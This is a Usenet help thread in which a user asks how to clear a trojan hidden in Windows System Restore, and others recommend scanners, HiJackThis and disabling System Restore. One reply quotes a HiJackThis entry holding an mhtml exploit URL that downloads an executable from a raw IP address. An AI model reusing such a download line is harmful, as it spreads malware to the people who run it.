Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande

Love That Music wrote:
> Hate to appear stupid, but I get a pop-up message that I have a trojan
> and to run AVG to get rid of it. I've run AVG regular and in safe
> mode, with no effect. (Popup reads : G:\System Volume Information \
> -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
> I've tried RegSupreme, Spybot, McAfee, with result showing that there
> is no problem, but I still get the popup. Does anyone have a
> suggestion to help me? Thank you, in advance.
> Earl Sande


Had a similar message on my WinME system, don't know what you're
using. I turned off my system restore, used A Squared at
http://www.emsisoft.com/en/ to get rid of the Trojan, then rebooted,
rechecked with A Squared and all now OK. Before I turned off Sys
Restore, the Trojan was just being restored every time.
HTH
KeithS

> Love That Music <(E-Mail Removed)> wrote:

>Hate to appear stupid, but I get a pop-up message that I have a trojan
>and to run AVG to get rid of it. I've run AVG regular and in safe
>mode, with no effect. (Popup reads : G:\System Volume Information \
>-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
>I've tried RegSupreme, Spybot, McAfee, with result showing that there
>is no problem, but I still get the popup. Does anyone have a
>suggestion to help me? Thank you, in advance.
>Earl Sande

It sounds like you have a contamination. I had one awhile back and I'm
totally at a loss as to how I got it. It hid within the System Restore
folder as yours has, so it might be a related malware. Mine had a
startup entry that redownloaded the virus. I did several complete
reinstalls and each was contaminated before I could get the critical
updates for XP. I'm guessing that the problem was a security breach in
XP that allowed it back in before I could get the patch, even though I
went straight to MS after each reinstall.

AVG didn't do anything for this. AntiVir was recommended here and it
did catch and clean, but that was only part of the solution. I had to
use HiJackThis to remove the startup entries that redownloaded the
infection and called another infected file that hides in the recycle
bin, which many scanners do not scan by default.


AntiVir Personal Edition:
http://www.free-av.com/

HiJackThis:
http://www.spywareinfo.com/~merijn/files/hijackthis.zip
http://www.spywareinfo.com/~merijn/index.html


These are the two entries I had to remove with HijackThis:
----------------------------------------------------------------------------------------------------------------------------------
O16 - DPF: {11111111-1111-1111-1111-111111111111} -
mhtml:file://C:NXSFT.MHT!http://66.117.38.54:80/iex/ofile.exe...0/dexUS604.exe

O16 - DPF: {11111111-1111-1111-1111-111111111123} -
file://c:\Recycled\1.exe
----------------------------------------------------------------------------------------------------------------------------------

The first is an mhtml exploit that redownloads the infection. The
second is a call to an infected file hiding in the recycle bin.

AntiVir will get the part hiding in your System Restore and on your
boot drive.

You will need to disable AVG. You don't want to run two virus
scanners. I think that after you experience AntiVir you will agree
that it is by far superior to AVG. It can clean the malwares.

I spent a whole bunch of time on this infection and I hope this will
prevent you from doing the same. If you are not patched you will need
the mhtml patch for sure to prevent further infections.

Good luck!




-----= Posted via Newsfeeds.Com, Uncensored Usenet News =-----
http://www.newsfeeds.com - The #1 Newsgroup Service in the World!
-----== Over 100,000 Newsgroups - 19 Different Servers! =-----

"Love That Music" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
> Hate to appear stupid, but I get a pop-up message that I have a trojan
> and to run AVG to get rid of it. I've run AVG regular and in safe
> mode, with no effect. (Popup reads : G:\System Volume Information \
> -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
> I've tried RegSupreme, Spybot, McAfee, with result showing that there
> is no problem, but I still get the popup. Does anyone have a
> suggestion to help me? Thank you, in advance.
> Earl Sande

Disable System Restore, scan for viruses, then reboot and re-enable System
Restore. How to disable and enable System Restore in Windows XP:
http://service1.symantec.com/SUPPORT...rc=sec_doc_nam

Regards,
Ian.

Love That Music <(E-Mail Removed)> wrote in
news:(E-Mail Removed):

> Hate to appear stupid, but I get a pop-up message that I have a trojan
> and to run AVG to get rid of it. I've run AVG regular and in safe
> mode, with no effect. (Popup reads : G:\System Volume Information \
> -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
> I've tried RegSupreme, Spybot, McAfee, with result showing that there
> is no problem, but I still get the popup. Does anyone have a
> suggestion to help me? Thank you, in advance.
> Earl Sande

any .scr (screensaver) would be a suspect for a trojan or virus, a real
common form of transmission

--
aardvark (ard'-vark) a controversial animal with a long probing nose used
for sniffing out the facts and stimulating thought and discussion.

Doc wrote:
> Love That Music <(E-Mail Removed)> wrote in
> news:(E-Mail Removed):
>
>
>>Hate to appear stupid, but I get a pop-up message that I have a trojan
>>and to run AVG to get rid of it. I've run AVG regular and in safe
>>mode, with no effect. (Popup reads : G:\System Volume Information \
>>-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
>>I've tried RegSupreme, Spybot, McAfee, with result showing that there
>>is no problem, but I still get the popup. Does anyone have a
>>suggestion to help me? Thank you, in advance.
>>Earl Sande
>
>
> any .scr (screensaver) would be a suspect for a trojan or virus, a real
> common form of transmission
>
Check your startup programs (use msconfig with win 98) and see if
A0037876.scr is there. Disable it. Many viruses put themselves in
startup. The cleaner gets rid of them elsewhere but leaves them in startup.

GA

--
My address is spoofed, so do not reply directly.

Thanks for all the help. Day 2 and all seems to be fixed. You people
are GREAT!
Earl

> Love That Music <(E-Mail Removed)> wrote:

>Thanks for all the help. Day 2 and all seems to be fixed. You people
>are GREAT!
>Earl

Out of curousity, how did you get rid of the bug?

ASquared was recommended to me, but at the time it did not detect the
infection.

What freeware tools did you use?




-----= Posted via Newsfeeds.Com, Uncensored Usenet News =-----
http://www.newsfeeds.com - The #1 Newsgroup Service in the World!
-----== Over 100,000 Newsgroups - 19 Different Servers! =-----

>Out of curousity, how did you get rid of the bug?
>
>ASquared was recommended to me, but at the time it did not detect the
>infection.
>
>What freeware tools did you use?

I turned off the System Restore, then used the ASquared. ASquared
didn't report finding any malware (although, let me write that I was
very impressed with the program in it showing what files were being
examined). Re-booted. Then turned on the System Restore. So Far -
Fingers crossed - there's no popup for the trojan.

Earl

On Thu, 01 Jul 2004 06:01:32 GMT, Love That Music
<(E-Mail Removed)> wrote:

>Hate to appear stupid, but I get a pop-up message that I have a trojan
>and to run AVG to get rid of it. I've run AVG regular and in safe
>mode, with no effect. (Popup reads : G:\System Volume Information \
>-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
>I've tried RegSupreme, Spybot, McAfee, with result showing that there
>is no problem, but I still get the popup. Does anyone have a
>suggestion to help me? Thank you, in advance.
>Earl Sande

I have seen this problem before. The trojan is inside your System
Restore files. AVG does not actually scan these files as default.
One way to get rid of this trojan is by doing a complete system
re-install, which isn't really the best option. Another way (and I
have only heard about this, never tried it so no comebacks please) is
to disable your System Restore program, run AVG, then once it has
found and cleansed the files, re-enable System Restore if you wish.

I would like to point out that a lot of people I have spoken to do not
actually recommend that the Windows System Restore is used, I myself
have had problems with it. There are other Restore programs available
but I have not used any.

Bebi

Quid sit futurum cras, fuge quaerere